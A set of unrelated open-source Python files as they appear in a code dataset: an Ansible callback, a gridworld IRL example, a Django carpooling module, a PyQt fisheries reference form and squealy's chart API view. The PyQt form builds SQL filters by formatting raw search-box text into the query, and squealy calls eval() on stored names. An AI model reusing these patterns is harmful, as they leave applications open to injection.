            ['UgenLFNoise1', 'LFNoise1'],
            ['UgenLFNoise2', 'LFNoise2'],
        ]),
        ("envelope", [
            ['UgenXLine', 'XLine'],
            ['UgenLine', 'Line'],
        ]),
        ("transport", [
            ['UgenIn', 'In'],
            ['UgenOut', 'Out'],
            ['UgenSplay', 'Splay'],
            ['SoundPetalSynthDef', 'Make SynthDef'],
        ]),
    )
    # OrderedDict preserves the insertion order of the pairs above
    return OrderedDict(categories)
def make_categories():
    """Build one FlowNodeCategory per entry returned by make_node_cats()."""
    result = []
    for cat_name, node_specs in make_node_cats().items():
        identifier = "FLOW_" + cat_name.replace(' ', '_')
        # Only the first two elements of each spec are used (id, label);
        # any optional trailing icon entry is ignored, as before.
        node_items = [NodeItem(spec[0], spec[1]) for spec in node_specs]
        result.append(FlowNodeCategory(identifier, cat_name, items=node_items))
    return result
| zeffii/SoundPetal | flow_nodes_index.py | Python | gpl-3.0 | 2,430 |
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default
class CallbackModule(CallbackModule_default):
    '''
    Variant of the default stdout callback that suppresses all "skipped"
    output: skipped tasks and skipped loop items are simply not printed.
    All other events behave exactly like the default callback.
    '''
    CALLBACK_VERSION = 2.0
    CALLBACK_TYPE = 'stdout'
    CALLBACK_NAME = 'skippy'
    def v2_runner_on_skipped(self, result):
        # Intentionally do nothing instead of printing "skipping: [host]"
        pass
    def v2_runner_item_on_skipped(self, result):
        # Intentionally do nothing for skipped loop items
        pass
| camradal/ansible | lib/ansible/plugins/callback/skippy.py | Python | gpl-3.0 | 1,317 |
from __future__ import division
import matplotlib
matplotlib.use('Qt4Agg')
from matplotlib import pyplot as plt
plt.style.use('fivethirtyeight')
import numpy as np
from funzo.domains.gridworld import GridWorld, GridWorldMDP
from funzo.domains.gridworld import GRewardLFA, GTransition, GReward
from funzo.planners.dp import PolicyIteration
from funzo.irl.birl import PolicyWalkBIRL, MAPBIRL
from funzo.irl.birl import GaussianRewardPrior
from funzo.irl import PolicyLoss, RewardLoss
SEED = None
def main():
    """Run PolicyWalk BIRL on a gridworld and plot the results.

    Loads a grid map, builds an expert linear reward, generates expert
    demonstrations from the optimal policy, recovers the reward with
    PolicyWalkBIRL and visualizes the recovered policy, value function
    and the loss traces of the MCMC chain.
    """
    gmap = np.loadtxt('maps/map_a.txt')
    # Expert reward weights, normalized to unit range
    w_expert = np.array([-0.01, -10.0, 1.0])
    w_expert /= (w_expert.max() - w_expert.min())
    with GridWorld(gmap=gmap) as world:
        rfunc = GRewardLFA(weights=w_expert, rmax=1.0)
        # rfunc = GReward()
        T = GTransition()
        g = GridWorldMDP(reward=rfunc, transition=T, discount=0.95)
        # ------------------------
        planner = PolicyIteration(random_state=SEED)
        plan = planner.solve(g)
        policy = plan['pi']
        demos = world.generate_trajectories(policy, num=50, random_state=SEED)
        # IRL
        r_prior = GaussianRewardPrior(dim=len(rfunc), mean=0.0, sigma=0.15)
        irl_solver = PolicyWalkBIRL(prior=r_prior, delta=0.2, planner=planner,
                                    beta=0.8, max_iter=1000, burn=0.3,
                                    random_state=SEED)
        trace = irl_solver.solve(demos=demos, mdp=g)
        trace.save('pw_trace')
        # Use the final posterior-mean estimate as the recovered reward
        r = trace['r_mean'][-1]
        g.reward.update_parameters(reward=r)
        r_plan = planner.solve(g)
        print('Found reward: {}'.format(r))
        V = r_plan['V']
        # w_expert = rfunc._R
        # compute the loss
        L = RewardLoss(order=2)
        # L = PolicyLoss(mdp=g, planner=planner, order=2)
        loss = [L.evaluate(w_expert, w_pi) for w_pi in trace['r']]
        loss_m = [L.evaluate(w_expert, w_pi) for w_pi in trace['r_mean']]
        # ------------------------
        fig = plt.figure(figsize=(8, 8))
        ax = fig.gca()
        ax = world.visualize(ax, policy=r_plan['pi'])
        plt.figure(figsize=(8, 8))
        plt.imshow(V.reshape(gmap.shape),
                   interpolation='nearest', cmap='viridis', origin='lower',
                   vmin=np.min(V), vmax=np.max(V))
        plt.grid(False)
        plt.title('Value function')
        plt.colorbar()
        plt.figure(figsize=(8, 6))
        plt.plot(trace['step'], loss)
        plt.plot(trace['step'], loss_m)
        # FIX: raw string so '\m' and '\p' are not (invalid) escape sequences;
        # the rendered TeX label is byte-identical to before.
        plt.ylabel(r'Loss function $\mathcal{L}_{\pi}$')
        plt.xlabel('Iteration')
        plt.tight_layout()
        import corner
        corner.corner(trace['r'])
        corner.corner(trace['r_mean'])
        plt.show()
if __name__ == '__main__':
    main()
| makokal/funzo | examples/gridworld/gridworld_birl.py | Python | mit | 2,673 |
from django.conf.urls import url, include
from modular_blocks import ModuleApp, TemplateTagBlock, modules
from . import urls
class CarpoolingModule(ModuleApp):
    """modular_blocks module exposing the carpooling app.

    Mounts the app's URLs under /carpooling/ and registers a template-tag
    block that renders the `get_cov` tag from the `cov_tag` library.
    """
    app_name = 'cov'
    name = 'cov'
    urls = url(r'^carpooling/', include(urls))
    templatetag_blocks = [
        TemplateTagBlock(
            name='cov',
            library='cov_tag',
            tag='get_cov',
            cache_time=60  # presumably seconds - TODO confirm units
        ),
    ]
# Register the module with the global modular_blocks registry at import time
modules.register(CarpoolingModule)
| rezometz/django-paiji2-carpooling | paiji2_carpooling/modular.py | Python | agpl-3.0 | 464 |
'''
Created on 15/07/2017
Class Main das Referencias.
Esta e a class que vai nos permitir inserir, editar e vizualizar os dados das tabelas de referencia,
A class abre um Dialog/form com:
TVMain: table view que vai nos permitir vizualizar os dados contidos no model
LEPesquisar: um lineEdit que vai servir de auxilo na pesquisa
CBGrupo: o Combox Grupo em um combox valido so para um tabela de refencia
PBPesquisar: e o botao que tera que se 'clickar', para poder realizar a pesquisa
PBAtualizar: e o botao que tera quue se 'clickar', para realizar a atulizacao(refresh) do form
PBAdicionar: e o botao que tera que se 'clickar', para se adicionar novos elementos
PBCancelar: este botao fecha o Dialog
PBEditar: e o botao que tera que se 'clickar', para se editar elementos
a class tambem contem os seguintes blocks
#Inicializacao Class - este e o block onde inicializamos as variaveis da class
#Inicializacao Data - este e o block onde inicializamos os dados, que iram popular todos elementos
#Events - este e o block dos eventos que serao realizados e com quem irao se connectar
#Metodos - Block dos metodos.
@author: chernomirdinmacuvele
'''
from ui_MainRef import Ui_MainForm
from PyQt5.Qt import QDialog, QTimer
import QT_tblViewUtility
import mixedModel as wrapModel
import QT_msg
from dlg_Diasemana import dlg_diasemana
from dlg_Simpel import dlg_simpel
from dlg_Artes import dlg_artes
from dlg_Especies import dlg_especies
from dlg_Geometric import dlg_geometric
from dlg_Tabelas import dlg_tabela
from dlg_TipLocal import dlg_tiplocal
import QT_widgetsCustom
from dlg_UniPescaTipo import dlg_UniPescaTipo
from dlg_IntClass import dlg_intClass
from dlg_pesqueiros import dlg_pesqueiros
from dlg_registadores import dlg_registadores
import CustomItemDelegates
import rscForm
class frmMainRef(QDialog, Ui_MainForm):
def __init__(self, parent = None, dbCon=None, mainIndex=None, user_info=None):#0
super(frmMainRef, self).__init__(parent)
self.setupUi(self)
#=======================================================================
#Inicializacao Class
'''
Este e o block onde inicializaremos as variaveis da class.
dbCon = A conneccao com a base de dados.
mainIndex = E a posicao onde os nossos dados estarao situados no dicionario principal (MainDict)
O dicionario principal deve estar organizado cosoante o dicionario de widgets da
Class MenuTypes.
'''
self.dbcon = dbCon
self.idx = mainIndex
self.mIndex=None
self.user_info = user_info
self.setSecurity()
self.setDict()
self.setMainDict()
self._toHide()
self._setFormToSelected()
self.costumForm()
self.toNormal()
#Eventos
self.CBGrupo.currentTextChanged.connect(self.onTextChange)
self.PBProcurar.clicked.connect(self.search)
self.PBAtualizar.clicked.connect(self.refresh)
self.PBAdicionar.clicked.connect(self.operacao)
self.PBVizualizar.clicked.connect(self.operacao)
self.PBEditar.clicked.connect(self.operacao)
self.TVMain.clicked.connect(self.afterClick)
self.PBCancelar.clicked.connect(self.close)
#Metodos
def onTextChange(self):#1
'''
Metodo que sera chamado quando houver alguma mudanca de texto no comBox,
Como funciona:
primerio levamos o texto que esta ser disposto/disponivel, no comBox,
para depois procurar o seu Codigo. Quando o codigo for encontrado, sera
devolvido.
Depois cria-se o filtro para mostrar so os dados corespondentes a esse
id.
E depois criamos o modelo para o view com o filtro.
'''
Id = wrapModel.getDataCombox(widg=self.CBGrupo)
filtro = ("id_grupo = '{combox}'").format(combox = Id)
self.setModelInView(filtro=filtro)
self.mIndex=None
def refresh(self):#2
'''
Metodo para atualizar/Refrescar o modelo, chamando o metodo _toHide()
'''
self._toHide()
self.mIndex=None
def search(self):#3
'''
Metodo para fazer pesquisa de nomes, dentro da tabela/modelo.
Como faz:
primerio verificamos se a refencia onde nos escontramos nao precisa do Combox,
- se nao vamos adicionar um filtro, com o nome digitado no Linha de texto.
- se sim vamos levar o valor corrente na combox e procuramos o seu codigo, com o codigo
do combox, e o valor do texto crimaos um filtro.
Depois reemplementamos o metodo setModelInView com o filtro definido.
'''
toHide = self.dictMain['toHideGrupo'][self.idx]
if toHide:
filtro = (self.dictMain['fldFiltro'][self.idx]).format(nome = self.LEFiltro.text())
else:
Id = wrapModel.getDataCombox(widg=self.CBGrupo)
nome = self.LEFiltro.text()
filtro = (self.dictMain['fldFiltro'][self.idx]).format(combox = Id, nome = nome)
self.setModelInView(filtro=filtro)
self.mIndex=None
def _toHide(self):#4
'''
Metodo para esconder ou nao CombBox depois configurar o modelo e atribuilo ao view.
Como faz:
primeiro verificamos se devemos ou nao esconder o combox,
- se sim, escodemos e depois chamamos o setModelInView()
- se Nao, chamamos o metodo setComBoxGrupo, que vai configurar e atribuir um modelo ao combox.
Depois chamamos o setModelInView agora com o filtro que sera so os elementos ligados ao combox ID.
'''
toHide = self.dictMain['toHideGrupo'][self.idx]
if toHide:
self.setModelInView()
else:
bOK = self.setComboxGrupo()
if bOK:
Id = wrapModel.getDataCombox(widg=self.CBGrupo)
filtro = ("id_grupo = '{combox}'").format(combox = Id)
self.setModelInView(filtro=filtro)
def setComboxGrupo(self):#5
'''
Metodo para configurar e atribuir um modelo a combox.
Todo processo e feito no modulo.setModel4ComBox
Args:
tblName= Nome da tabela
lstNames= Nome das colunas, sempre sao 2 (id, Nomes) porque nos queremos quer o combox mostre o id das colunas
widg= O object widget (combox)
condName= caso tenhe alguma condicao aqui vamos passar o nome (id)
condVal= a qui o valor ('XPT')
condQuot= e aqui sera se sera quoted ou nao (True e false)
'''
bOK = False
try:
tblName= self.dictMain['fldDlgDict'][self.idx]['condTbl']
lstNames= self.dictMain['fldDlgDict'][self.idx]['condCol']
widg= self.CBGrupo
condName= self.dictMain['fldDlgDict'][self.idx]['condName']
condVal= self.dictMain['fldDlgDict'][self.idx]['condVal']
condQuot= self.dictMain['fldDlgDict'][self.idx]['condToQuote']
wrapModel.setModel4CombBox(tblName=tblName, lstNames=lstNames, widg=widg, condName=condName, condVal=condVal, condQuot=condQuot)
bOK = True
return bOK
except KeyError as ky:
QT_msg.error(txt='Error Elemento nao encontrado', verbTxt=str(ky))
return bOK
def setModel(self, filtro=None):#6
'''
Metodo para configurar o modelo que sera usado para relaizar a visualizacao de dados
Args:
filtro: sera passado, quando se usar o bottao pesquisar
'''
tblName = self.dictMain["tblName"][self.idx]
lstVal2Rel =self.dictMain['fldDlgDict'][self.idx]['val2Rel']
lstRelTblName =self.dictMain['fldDlgDict'][self.idx]['fldRelTblMain']
lstNewNames =self.dictMain['fldDlgDict'][self.idx]['headerTitle']
bOK, model = wrapModel.setViewModel(tblName = tblName, filtro = filtro, lstVal2Rel = lstVal2Rel, lstRelTblName = lstRelTblName, lstNewNames = lstNewNames)
self.deleg = CustomItemDelegates.CustomItemDelegate()
lstToHide = self.dictMain['fldDlgDict'][self.idx]['lstToHide']
QT_tblViewUtility.setModelInView(tblView= self.TVMain, ViewModel= model, toHide= lstToHide)
self.TVMain.setItemDelegate(self.deleg)
return (bOK, model)
def setModelInView(self, filtro=None):#7
'''
Metodo para atribuir um model condfigurado ao view, caso
o model tenha sido configurado com sucessos o metodo ira atribuir ao
view um model.
Args:
filtro: sera passado, quando se usar o bottao pesquisar
'''
bOK, model = self.setModel(filtro=filtro)
if bOK:
self.TVMain.setModel(model)
def afterClick(self, mIdx=None):#8
'''
metodo so para atualizar o modelIndex depois de se ter selecionado um na tabela.
'''
self.mIndex = mIdx
def operacao(self):#9
bOk=False
if self.sender() is self.PBEditar or self.sender() is self.PBVizualizar:
indexModel = self.mIndex
if indexModel is None:
QT_msg.aviso(txt='Aviso 9.1: Selecione um elemento na tabela para poder Editar')
else:
bOk, msgOut= self.openDlgPOP(indexModel= indexModel)
elif self.sender() is self.PBAdicionar:
bOk, msgOut= self.openDlgPOP()
if bOk:
if msgOut is not None:
self.showMsg(obj= self.LBwhois, msgAlert= msgOut)
self.refresh()#Changed
self.mIndex=None
def openDlgPOP(self, indexModel=None):#10
msgOut=None
toHide = self.dictMain['toHideGrupo'][self.idx]
_,_,level = self.user_info
try:
if toHide:
run = self.dictMain["dlgToPop"][self.idx](dbcon = self.dbcon, tblName=self.dictMain["tblName"][self.idx], indexModel=indexModel, level= level)
else:
curText = self.CBGrupo.currentText()
run = self.dictMain["dlgToPop"][self.idx](dbcon = self.dbcon, tblName=self.dictMain["tblName"][self.idx], indexModel=indexModel, idx=curText, level= level)
run.exec_()
if run.close():
bOK, msgOut = run.bOK
else:
bOK= False
except Exception:
QT_msg.error(txt="Error 10.1: A Pagina fechou inesperadamente porfavor tente novamente.", verbTxt = str(Exception))
bOK= False
return bOK, msgOut
def _setFormToSelected(self):#13
'''
Metodo para formatar o Form para o que estiver selecionado.
'''
idx = self.idx
self.setWindowTitle(self.dictMain['formLabelName'][idx])
self.LBTitulo.setText(self.dictMain['formLabelName'][idx])
self.LBGrupo.setHidden(self.dictMain['toHideGrupo'][idx])
self.CBGrupo.setHidden(self.dictMain['toHideGrupo'][idx])
def costumForm(self):#14
widx = self.dictMain['fldDlgDict'][self.idx]['sizeForm'][0]
hidx = self.dictMain['fldDlgDict'][self.idx]['sizeForm'][1]
lstSizeCol = self.dictMain['fldDlgDict'][self.idx]['sizeCol']
QT_tblViewUtility.resizeForm(formToResize=self, Wx=widx, Hx=hidx)
QT_tblViewUtility.setViewCustom(tblView=self.TVMain, lstSizeCol=lstSizeCol)
def showMsg(self, obj=None, msgAlert=None):
time = QTimer(self)
obj.setText(msgAlert)
QT_widgetsCustom.successDatabase(obj= obj)
time.start(10000)
time.setSingleShot(True)
time.timeout.connect(self.toNormal)
def toNormal(self):
_,userName,_ = self.user_info
objName = self.LBwhois.objectName()
css= "#"+str(objName)+"""{
color:black;
}"""
self.LBwhois.setStyleSheet(css)
self.LBwhois.setText(str(userName).capitalize())
def setSecurity(self):
'''
Metodo para abilitar e desabilitar os campos de acordo com o nivel do usuario.
'''
self.setDictSecurity()
_,_,level = self.user_info
lstWdg = self.dictLocked[str(level)]
if lstWdg is not None:
rscForm.setReadOnlyAll(True, lstWdg)
def setDict(self):
'''
Metodo para confirgurar o dicionario dictXXX
que vao axiliar na criacao de modelos e dialogs
que sera compostos por:
Args:
Nota1 - este sao os valores usados para cria o modelo sao os valores basicos que um dicioanrio precisa ter para poder
usar o wrapper mixedModel.
- fldName: Nomes das colunas na base de dados
- headerTitle:a os novos Nomes que seram mostrados no header
- toQuote:
Nota2: este sao os valores usados para cricao da relacao
- val2Rel: Nome do elementos que queremos relacionar normalmente e o nome id pois no mixed model levamos sempre o segundo elemento como nome
- fldRelTblMain: Nome da tabela aqual nos relacionamos
Nota3: este sao os valores que iram axiliar na producao do combox, nem todos tem este valores pois eles sao exclusivos so para
as tabelas que depende do grupo
Nota4: dictSimpel corresponde as tabelas (nivel, grupo)
'''
self.dictPesquerio = {
'fldName': ["id", "id_centro", "nome", "comentario", "activo"],
'headerTitle': ['Cod.', 'Provincia', 'Nome', 'Comentario', 'Activo'],
'lstToHide':[True, False, False, True, False],
'fldToQuote': [False, True, True, True, True],
'val2Rel': [None, ['id', 'Nome'], None, None, None],
'fldRelTblMain': [None, 'ref_geometric', None, None, None],
'sizeCol':[50, 250, 300, 100, 100],
'sizeForm':[937, 617],
}
self.dictRegistador = {
'fldName': ["id", "id_centro", "nome", "comentario", "activo"],
'headerTitle': ['Cod.', 'Provincia', 'Nome', 'Comentario', 'Activo'],
'lstToHide':[True, False, False, True, False],
'fldToQuote': [False, True, True, True, True],
'val2Rel': [None, ['id', 'Nome'], None, None, None],
'fldRelTblMain': [None, 'ref_geometric', None, None, None],
'sizeCol':[50, 250, 300, 190, 190],
'sizeForm':[937, 617],
}
self.dictArtes= {
'fldName': ["id", "nome", "id_uniesforco", "id_unitrabalho", "id_tippesca", "descricao", "comentario", "activo"],
'headerTitle':["Cod.", "Nome", "Unidade de Esforco", "Unidade de Trabalho", "Tipo de Pesca", "Descricao", "Comentarios", "Activo"],
'lstToHide':[True, False, False, False, True, True, True, False],
'fldToQuote': [True, True, True, True, True, True, True, False],
'val2Rel': [None, None, ['id', 'nome'], ['id', 'nome'], ['id', 'nome'], ['id','nome'], None, None, None],
'fldRelTblMain': [None, None, 'ref_table', 'ref_table', 'ref_table', None, None, None, None, None],
'sizeCol':[80, 200, 200, 200, 200, 100, 100, 50],
'sizeForm':[1017, 617],
}
self.dictDiaSemana= {
'fldName': ["id", "id_tipdia", "nome", "descricao", "comentario", "activo"],
'headerTitle': ["Cod.", "Tipo de Dia", "Nome", "Descricao", "Comentarios", "Activo"],
'lstToHide':[True, False, False, True, True, False],
'fldToQuote': [True, True, True, True, True, False],
'val2Rel': [None, ['id','nome'],None, None, None,None],
'fldRelTblMain': [None, 'ref_table', None, None, None, None],
'sizeCol':[100, 200, 300, 120, 120, 50],
'sizeForm':[937, 617],
}
self.dictEspecies= {
'fldName': ["id", "familia", "genus", "species", "id_habitat", "minlength", "maxlength", "intlength", "intmaxlen", "ana_comesp", "comentario", "activo", 'nome'],
'headerTitle': ["Cod.", "Familia", "Genus", "Especie", "Habitate", "comp.mínimo", "comp.máximo", "Int.comum", "Int.máximo", "A.Composicao", "Comentarios", "Activo", "Nome"],
'lstToHide':[True, False, False, False, True, True, True, True, True, True, True,False, False],
'fldToQuote': [True, True, True, True, True, False, False, False, False, False, True, False, False],
'val2Rel': [None, None, None, None, ['id', 'nome'], None, None, None, None, None, None, None, None],
'fldRelTblMain': [None, None, None, None, 'ref_table', None, None, None, None, None, None, None, None],
'sizeCol':[80, 180, 180, 180, 150, 40, 40, 40, 40, 50, 100, 50, 150],
'sizeForm':[1098, 617],
}
self.dictGeometric= {
'fldName': ["id", "id_tiplocal", "id_parent" , "nome", "descricao", "comentario", "activo"],
'headerTitle': ["Cod.", "Tipo de Local", "Parente", "Nome", "Descricao", "Comentarios", "Activo"],
'lstToHide':[True, False, False, False, True, True, False],
'fldToQuote': [True, True, True, True, True, True, False],
'val2Rel': [None,['id', 'nome'], ['id','nome'], None, None, None, None],
'fldRelTblMain': [None, 'ref_tiplocal','ref_geometric', None, None, None, None],
'sizeCol':[80, 200, 200, 200, 125, 125, 50],
'sizeForm':[937, 617],
}
self.dictSimpel= {
'fldName': ["id", "nome","descricao", "comentario", "activo"],
'headerTitle': ['Cod.', 'Nome', 'Descricao', 'Comentarios', 'Activo'],
'lstToHide':[True, False, True, True, False],
'fldToQuote': [True, True, True, True, False],
'val2Rel': [None, None, None, None, None],
'fldRelTblMain': [None, None, None, None, None],
'sizeCol':[50, 450, 200, 200, 50],
'sizeForm':[937, 617],
}
self.dictTipLocal= {
'fldName': ["id", "id_nivel", "nome", "descricao", "comentario", "activo"],
'headerTitle': ["Cod.", "Nivel", "Nome", "Descricao", "Comentarios", "Activo"],
'lstToHide':[True, False, False, True, True, False],
'fldToQuote': [True, True, True, True, True, False],
'val2Rel': [None, ['id','nome'],None, None, None,None],
'fldRelTblMain': [None, 'ref_nivel', None, None, None, None],
'sizeCol':[100, 250, 250, 120, 120, 50],
'sizeForm':[937, 617],
}
self.dictTables= {
'fldName': ["id", "id_grupo", "nome", "descricao", "comentario", "activo"],
'headerTitle': ['Cod.', "Grupo", 'Nome', 'Descricao', 'Comentarios', 'Activo'],
'lstToHide':[True, False, False, True, True, False],
'fldToQuote': [True, True, True, True, True, False],
'val2Rel': [None, ['id', 'nome'], None, None, None, None],
'fldRelTblMain':[None, 'ref_grupo', None, None, None, None],
'condTbl': 'ref_grupo',
'condCol': ['id','nome'],
'condName': 'activo',
'condVal': True,
'condToQuote': False,
'sizeCol':[80, 200, 400, 140, 140, 50],
'sizeForm':[937, 617],
}
self.dictIntClass= {
'fldName': ["id", "id_especie", "intervalo", "comentario", "activo"],
'headerTitle': [ "Cod.", "Especie", "Intevalo", "Comentarios", "Activo"],
'lstToHide':[True, False, False, True, False],
'fldToQuote': [False, True, True, True,False ],
'val2Rel': [None, ['id','nome'],None, None, None],
'fldRelTblMain': [None, 'ref_especies', None, None, None, None],
'sizeCol':[50, 400, 180, 200, 100],
'sizeForm':[937, 617],
}
self.dictUniPescaTipo= {
'fldName': ["id", "nome", "id_arte", "id_tipbarco", "activo", "descricao"],
'headerTitle': ["Cod.","Nome", "Arte", "Tipo de barco", "Activo", "Descricao"],
'lstToHide':[True, False, False, False, False, True],
'fldToQuote': [True, True, True, True, False, True],
'val2Rel': [None, None,['id','nome'], ['id','nome'],None, None],
'fldRelTblMain': [None, None, 'ref_artes', 'ref_table',None, None],
'sizeCol':[100, 250, 170, 170, 100, 50],
'sizeForm':[937, 617],
}
def setMainDict(self):
    '''
    Build the master dictionary that drives data handling: it configures
    the form, the pop-out dialogs and how reference data is displayed.
    All values are parallel lists: index i in every list describes the
    same reference table.
    '''
    self.dictMain = {
        # Column/field configuration dict for each reference table.
        'fldDlgDict' : [self.dictSimpel, self.dictArtes, self.dictDiaSemana, self.dictEspecies,
                        self.dictGeometric, self.dictSimpel, self.dictTables, self.dictTipLocal,
                        self.dictPesquerio, self.dictRegistador, self.dictUniPescaTipo, self.dictIntClass],
        # Label shown on the form for each entry.
        'formLabelName' : ['Codificadores', 'Artes', 'Dias da Semana', 'Especies', ' Geometric', 'Nivel', 'Codificador ',
                           'Tipo de Local', 'Pesqueiro', 'Registador', 'Tipo de Unidade Pesca', 'Intervalo de Class'],
        # Whether the "grupo" selector is hidden for each entry
        # (only the 'Codificador ' entry shows it).
        'toHideGrupo': [True, True, True, True, True, True, False, True, True, True, True, True],
        # Dialog class popped up to add/edit a record of each table.
        'dlgToPop': [dlg_simpel, dlg_artes, dlg_diasemana, dlg_especies, dlg_geometric, dlg_simpel, dlg_tabela, dlg_tiplocal,
                     dlg_pesqueiros, dlg_registadores, dlg_UniPescaTipo, dlg_intClass],
        # Database table backing each entry.
        'tblName': ['ref_grupo', 'ref_artes', 'ref_diasemana', 'ref_especies', 'ref_geometric', 'ref_nivel', 'ref_table',
                    'ref_tiplocal', 'ref_pesqueiro', 'ref_registador', 'ref_unidpescatipo', 'ref_intervalo_class'],
        # SQL WHERE template used to filter each table; {nome} and {combox}
        # are substituted with the search widgets' current values.
        'fldFiltro':["ref_grupo.nome LIKE '%{nome}%'", "ref_artes.nome LIKE '%{nome}%'", "ref_diasemana.nome LIKE '%{nome}%'", "ref_especies.species LIKE '%{nome}%'",
                     "ref_geometric.nome LIKE '%{nome}%'", "ref_nivel.nome LIKE '%{nome}%'", "id_grupo = '{combox}' and ref_table.nome LIKE '%{nome}%'",
                     "ref_tiplocal.nome LIKE '%{nome}%'", "ref_pesqueiro.nome LIKE '%{nome}%'", "ref_registador.nome LIKE '%{nome}%'", "ref_unidpescatipo.nome LIKE '%{nome}%'",
                     "ref_intervalo_class.comentarios = ref_intervalo_class.comentarios"]
    }
def setDictSecurity(self):
    '''
    Define which widgets are locked for each user access level.
    Levels '0' and '1' may not add or edit records; admin levels
    ('10', '99') have no locked widgets.
    '''
    # Build a fresh button list per restricted level so the lists stay
    # independent objects, exactly as before.
    self.dictLocked = {
        level: [self.PBAdicionar, self.PBEditar] for level in ('0', '1')
    }
    self.dictLocked.update({'10': None, '99': None})
| InUrSys/PescArt2.0 | src/Tabelas/frmMainRef.py | Python | gpl-3.0 | 25,640 |
from django.contrib.auth.models import Permission
from django.db import connections
from django.shortcuts import render
from django.db import transaction
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.decorators import permission_classes, api_view
from rest_framework.permissions import IsAdminUser, BasePermission
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from jinjasql import JinjaSql
from squealy.serializers import ChartSerializer
from .exceptions import RequiredParameterMissingException,\
ChartNotFoundException, MalformedChartDataException, \
TransformationException
from .transformers import *
from .formatters import *
from .parameters import *
from .utils import SquealySettings
from .table import Table
from .models import Chart, Transformation, Validation, Parameter
from .validators import run_validation
# Shared module-level JinjaSql instance used to render templated chart
# queries into SQL plus bind parameters (see ChartView._execute_query).
jinjasql = JinjaSql()
class ChartViewPermission(BasePermission):
    """Permission appended to ChartView.permission_classes.

    Currently grants access to every request; it exists as an extension
    point for chart-level access control.
    """
    def has_permission(self, request, view):
        # Unconditionally allow; any real checks come from the default
        # permission classes configured via SquealySettings.
        return True
class ChartView(APIView):
    """API endpoint that executes a chart's stored SQL query and returns the
    formatted result.

    GET  runs the chart at ``chart_url`` with parameters from the query string.
    POST is used by the authoring interface to test-run a chart, with
    ``params`` and ``user`` supplied in the request body.
    """

    # NOTE(review): this appends to the list returned by
    # get_default_permission_classes(); that call must return a fresh list
    # each time, otherwise class-level state is shared — confirm.
    permission_classes = SquealySettings.get_default_permission_classes()
    permission_classes.append(ChartViewPermission)
    authentication_classes = [SessionAuthentication, BasicAuthentication]
    authentication_classes.extend(SquealySettings.get_default_authentication_classes())

    def get(self, request, chart_url=None, *args, **kwargs):
        """Execute the chart's query and return its data.

        Raises ChartNotFoundException when no chart matches ``chart_url``.
        """
        chart_attributes = ['parameters', 'validations', 'transformations']
        chart = Chart.objects.filter(url=chart_url).prefetch_related(*chart_attributes).first()
        if not chart:
            raise ChartNotFoundException('No charts found at this path')
        params = request.GET.copy()
        user = request.user
        data = self._process_chart_query(chart, params, user)
        return Response(data)

    def post(self, request, chart_url=None, *args, **kwargs):
        """Run and test a chart query from the authoring interface.

        Unlike ``get``, any failure is reported as a 400 response with the
        error message, so the authoring UI can display it.
        """
        try:
            params = request.data.get('params', {})
            user = request.data.get('user', None)
            chart_attributes = ['parameters', 'validations', 'transformations']
            chart = Chart.objects.filter(url=chart_url).prefetch_related(*chart_attributes).first()
            if not chart:
                raise ChartNotFoundException('No charts found at this path')
            data = self._process_chart_query(chart, params, user)
            return Response(data)
        except Exception as e:
            return Response({'error': str(e)}, status.HTTP_400_BAD_REQUEST)

    def _process_chart_query(self, chart, params, user):
        """Run the full pipeline: parse parameters, run validations, execute
        the query, apply transformations and format the result."""
        parameter_definitions = chart.parameters.all()
        if parameter_definitions:
            params = self._parse_params(params, parameter_definitions)
        validations = chart.validations.all()
        if validations:
            self._run_validations(params, user, validations)
        # Execute the query; returns a Table (columns + rows).
        table = self._execute_query(params, user, chart.query)
        transformations = chart.transformations.all()
        if transformations:
            table = self._run_transformations(table, transformations)
        # Format the table for google charts / highcharts / plain JSON etc.
        return self._format(table, chart.format)

    def _parse_params(self, params, parameter_definitions):
        """Fill in defaults, enforce mandatory parameters and coerce each
        value to its declared data type.

        Raises RequiredParameterMissingException when a mandatory parameter
        has neither a supplied value nor a default.
        """
        for param in parameter_definitions:
            # Apply the default when the caller supplied nothing (or '').
            if param.default_value and \
                    param.default_value != '' and \
                    params.get(param.name) in [None, '']:
                params[param.name] = param.default_value
            if param.mandatory and params.get(param.name) is None:
                raise RequiredParameterMissingException("Parameter required: " + param.name)
            # SECURITY NOTE(review): eval() of a database-stored type name.
            # data_type is admin-controlled, but an explicit whitelist mapping
            # of parameter classes would be safer than eval.
            parameter_type = eval(param.data_type.title())
            if params.get(param.name):
                params[param.name] = parameter_type(param.name, **param.kwargs).to_internal(params[param.name])
        return params

    def _run_validations(self, params, user, validations):
        """Run every validation query; run_validation raises on failure."""
        for validation in validations:
            run_validation(params, user, validation.query)

    def _execute_query(self, params, user, chart_query):
        """Render the Jinja-templated query with bind parameters and execute
        it against the 'query_db' connection, returning a Table."""
        query, bind_params = jinjasql.prepare_query(chart_query,
                                                    {
                                                        "params": params,
                                                        "user": user
                                                    })
        conn = connections['query_db']
        with conn.cursor() as cursor:
            cursor.execute(query, bind_params)
            cols = [desc[0] for desc in cursor.description]
            rows = []
            for db_row in cursor:
                row_list = []
                for value in db_row:
                    if isinstance(value, str):
                        # NOTE(review): every string cell is encoded to UTF-8
                        # bytes (handles non-ASCII content); confirm the
                        # formatters/serializers expect bytes here.
                        value = value.encode('utf-8')
                    row_list.append(value)
                rows.append(row_list)
        return Table(columns=cols, data=rows)

    def _format(self, table, format):
        """Format the Table with the chart's configured formatter.

        'table'/'json' select SimpleFormatter; any other non-empty value is
        treated as a formatter class name; default is GoogleChartsFormatter.
        """
        if format:
            if format in ['table', 'json']:
                formatter = SimpleFormatter()
            else:
                # SECURITY NOTE(review): eval() of a stored formatter name —
                # prefer an explicit name->class mapping.
                formatter = eval(format)()
            return formatter.format(table)
        return GoogleChartsFormatter().format(table)

